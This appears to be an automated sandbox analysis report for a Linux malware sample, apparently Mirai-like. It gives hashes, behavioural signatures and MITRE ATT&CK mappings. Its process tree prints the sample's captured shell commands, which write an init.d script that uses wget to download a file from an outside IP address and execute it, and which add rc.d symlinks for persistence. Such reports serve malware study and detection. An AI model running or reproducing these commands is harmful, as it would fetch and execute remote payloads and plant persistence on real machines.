Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
08/09/2024, 18:29
Static task
static1
Behavioral task
behavioral1
Sample
x.nn
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
x.nn
-
Size
76KB
-
MD5
973a64d7c0dfa2aa3fdeeed0b15b14bb
-
SHA1
9533d5194a3d9c6ced530a2f300f0edfa5cccb69
-
SHA256
15d168a0a401611890ff27e5cc69edde969d42defa25a82758d8401804bc04ec
-
SHA512
028b138d464485de35094f3754ff6a3d917a50181cd28f1633fa5fb2bc672bcc739dfdd2cdccde1b7393c8caf3009bb58383775d591de8caea9f96c7caaa1079
-
SSDEEP
1536:/l1h73pl93YNjnYhd0t++IXonF9dzeet7TxOrQy:tb0jnYhd7ovtD/mQy
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1574 sh 1575 sh 1576 chmod -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog x.nn File opened for modification /dev/misc/watchdog x.nn -
description ioc Process File opened for modification /etc/init.d/x.nn sh -
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local x.nn -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /var/igorilla 1572 x.nn -
description ioc Process File opened for reading /proc/filesystems mkdir
Processes
-
/tmp/x.nn/tmp/x.nn1⤵
- Modifies Watchdog functionality
- Modifies rc script
- Changes its process name
PID:1572 -
/bin/shsh -c "echo \"#!/bin/sh # /etc/init.d/x.nn case \\\"\$1\\\" in start) echo 'Starting x.nn' /tmp/x.nn & wget http://45.202.35.35/lol -O /tmp/lol chmod +x /tmp/lol /tmp/lol & ;; stop) echo 'Stopping x.nn' killall x.nn ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/x.nn"2⤵
- File and Directory Permissions Modification
- Modifies init.d
PID:1574
-
-
/bin/shsh -c "chmod +x /etc/init.d/x.nn"2⤵
- File and Directory Permissions Modification
PID:1575 -
/usr/bin/chmodchmod +x /etc/init.d/x.nn3⤵
- File and Directory Permissions Modification
PID:1576
-
-
-
/bin/shsh -c "mkdir -p /etc/rc.d"2⤵PID:1577
-
/usr/bin/mkdirmkdir -p /etc/rc.d3⤵
- Reads runtime system information
PID:1578
-
-
-
/bin/shsh -c "ln -s /etc/init.d/x.nn /etc/rc.d/S99x.nn"2⤵PID:1579
-
/usr/bin/lnln -s /etc/init.d/x.nn /etc/rc.d/S99x.nn3⤵PID:1580
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Boot or Logon Initialization Scripts
2RC Scripts
2Privilege Escalation
Boot or Logon Autostart Execution
2Boot or Logon Initialization Scripts
2RC Scripts
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53B
MD52bd9b4be30579e633fc0191aa93df486
SHA17d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA25664dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5